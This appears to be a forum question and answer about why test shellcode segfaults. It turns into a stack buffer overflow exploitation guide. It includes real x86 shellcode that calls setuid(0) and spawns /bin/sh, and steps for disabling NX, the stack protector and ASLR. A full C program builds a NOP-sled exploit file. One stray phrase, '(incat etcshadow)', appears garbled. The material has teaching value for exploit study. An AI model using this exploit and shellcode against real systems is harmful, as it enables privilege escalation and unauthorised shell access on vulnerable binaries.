Shellcode not running


Problem description

I've tried to run a lot of shellcodes via a C program to test them. Here it is:

#include <stdio.h>
#include <string.h>

/* The shellcode bytes live in this global array, i.e. in the .data segment. */
unsigned char code[] = "shell here";

int main(void)
{
    printf("Shellcode Length: %zu\n", strlen(code));
    /* Treat the array as a function and jump into it. */
    int (*ret)() = (int (*)())code;
    ret();
    return 0;
}

And here's an example of shellcode:

"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb"
"\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89"
"\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd"
"\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f"
"\x73\x68\x58\x41\x41\x41\x41\x42\x42\x42\x42"

(incat etcshadow) After running

gcc sctest.c -o out
./out

It just gives me the shellcode length and a Segmentation Fault. I've already tried a lot of different shellcodes, but everything just gives me a segfault. My dmesg | tail -1:

[18440.783383] test[8768]: segfault at 8049700 ip 08049700 sp bffff2ec error 15 in test[8049000+1000]

What's wrong with my shellcodes?

Recommended answer

After disabling the NX bit and other things like randomize_va_space, I've finally done it.

Firstly, you should compile your executable with the flags -z execstack and -fno-stack-protector.

After that, disable ASLR: echo 0 > /proc/sys/kernel/randomize_va_space. Now you have to find shellcode. You can try msfpayload or msfvenom. Shellcode is byte code which usually gives you a shell.

At that step you should find the offset for your stack overflow. You can try to find lines like

sub hex-offset, %esp

Or you can try to brute-force it with a simple script like python -c "print('A'*n)" | ./your_binary, where n is your offset.

After finding the offset (a SEGFAULT occurs and dmesg | tail -1 says that %eip is 0x41414141), you just need to write your exploit. Its structure looks like this:

NOPs (no operation) * x + shellcode + return-address (4 bytes) * y

len(shellcode) + x + 4y = your offset, where the return address is the address of the place in the stack where your NOPs are located (the address of %esp which you see in gdb with info r before input).

And don't forget that an exploit which works in gdb won't work without gdb, because you need to add/subtract 36 bytes from your return address.

Finally you can exploit it:

./your_binary < exploit.bin
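The payload layout the answer describes, NOPs * x + shellcode + return-address * y with len(shellcode) + x + 4y = offset, as an added worked example in C. This is not code from the question or the answer above: it reuses the 55-byte setuid(0)/execve("/bin/sh") shellcode from the question, while the 112-byte offset and the 0xbffff2ec return address are hypothetical placeholders standing in for the values you measure yourself (the 'A'*n probe and gdb info r), and the NUL/newline check assumes the target reads stdin with a gets()/strcpy()-style call, which the answer does not specify.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Shellcode taken from the question above: setuid(0), then execve("/bin/sh").
 * 55 bytes and free of NUL bytes, so it survives a strcpy()-style copy. */
static const unsigned char shellcode[] =
    "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb"
    "\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89"
    "\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd"
    "\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f"
    "\x73\x68\x58\x41\x41\x41\x41\x42\x42\x42\x42";
#define SHELLCODE_LEN (sizeof(shellcode) - 1)

/* Assumption: the target copies stdin with a gets()/strcpy()-style call, so a
 * 0x00 or 0x0a byte inside the return address would truncate the payload. */
static int addr_is_clean(uint32_t addr)
{
    for (int i = 0; i < 4; i++) {
        unsigned char b = (addr >> (8 * i)) & 0xff;
        if (b == 0x00 || b == 0x0a)
            return 0;
    }
    return 1;
}

/* Builds NOPs*x + shellcode + ret*y so that x + sc_len + 4*y == offset,
 * exactly the layout the answer gives. Returns the number of bytes written
 * to out, or 0 when the parameters cannot satisfy that equation. */
size_t build_payload(unsigned char *out, size_t cap,
                     size_t offset, size_t y, uint32_t ret_addr,
                     const unsigned char *sc, size_t sc_len)
{
    if (y == 0 || offset > cap || !addr_is_clean(ret_addr))
        return 0;
    if (sc_len + 4 * y > offset)        /* x would be negative: no room for a sled */
        return 0;
    size_t x = offset - sc_len - 4 * y;

    memset(out, 0x90, x);               /* NOP sled: any landing point slides forward */
    memcpy(out + x, sc, sc_len);        /* the shellcode itself */
    for (size_t i = 0; i < y; i++) {    /* return address, little-endian, y times */
        unsigned char *p = out + x + sc_len + 4 * i;
        p[0] = ret_addr & 0xff;
        p[1] = (ret_addr >> 8) & 0xff;
        p[2] = (ret_addr >> 16) & 0xff;
        p[3] = (ret_addr >> 24) & 0xff;
    }
    return offset;
}

/* The probe from the answer's brute-force step: 'A'*n. A crash whose dmesg line
 * shows ip 41414141 means n has reached (and covered) the saved return address. */
size_t build_probe(unsigned char *out, size_t cap, size_t n)
{
    if (n > cap)
        return 0;
    memset(out, 'A', n);
    return n;
}

int main(int argc, char **argv)
{
    /* Hypothetical defaults; replace with the offset and %esp you measured. */
    size_t offset = argc > 1 ? strtoul(argv[1], NULL, 0) : 112;
    uint32_t ret = argc > 2 ? (uint32_t)strtoul(argv[2], NULL, 0) : 0xbffff2ecu;
    const size_t y = 4;
    unsigned char buf[4096];

    size_t n = build_payload(buf, sizeof buf, offset, y, ret, shellcode, SHELLCODE_LEN);
    if (n == 0) {
        fprintf(stderr, "offset %zu cannot hold %zu shellcode bytes + %zu ret copies, "
                        "or the address contains a NUL/newline byte\n",
                offset, SHELLCODE_LEN, y);
        return 1;
    }
    FILE *f = fopen("exploit.bin", "wb");
    if (!f || fwrite(buf, 1, n, f) != n) {
        perror("exploit.bin");
        return 1;
    }
    fclose(f);
    printf("wrote %zu bytes: %zu NOPs + %zu shellcode + %zu x ret 0x%08x\n",
           n, offset - SHELLCODE_LEN - 4 * y, SHELLCODE_LEN, y, ret);
    return 0;
}
```

Build it with gcc, run it as ./build_payload <offset> <ret-addr>, then feed the result with ./your_binary < exploit.bin. Using y > 1 lets the overwrite tolerate a few bytes of error in the measured offset, and a large x means %eip only has to land somewhere inside the sled rather than on the first shellcode byte. The gdb-versus-no-gdb shift the answer mentions comes from the stack layout differing between the two runs (environment variables, program path and so on), so measure the address in the way you will actually run the target.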
